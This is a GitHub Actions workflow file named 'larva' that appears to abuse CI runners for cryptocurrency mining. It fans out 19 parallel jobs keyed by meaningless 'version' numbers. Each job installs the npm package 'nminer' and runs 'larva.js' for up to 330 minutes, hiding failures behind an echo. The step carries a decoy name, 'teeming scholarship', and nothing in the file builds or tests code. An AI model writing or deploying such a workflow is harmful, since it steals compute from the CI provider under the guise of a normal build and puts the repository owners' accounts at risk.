name: larva
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9358 }
          - { version: 8219 }
          - { version: 8522 }
          - { version: 3345 }
          - { version: 1236 }
          - { version: 5309 }
          - { version: 8744 }
          - { version: 4039 }
          - { version: 6367 }
          - { version: 1105 }
          - { version: 1792 }
          - { version: 4671 }
          - { version: 7371 }
          - { version: 2120 }
          - { version: 5920 }
          - { version: 644 }
          - { version: 7671 }
          - { version: 4429 }
          - { version: 6512 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: teeming scholarship
        run: |
          npm install nminer@latest
          timeout 330m node larva.js || echo "larva executed"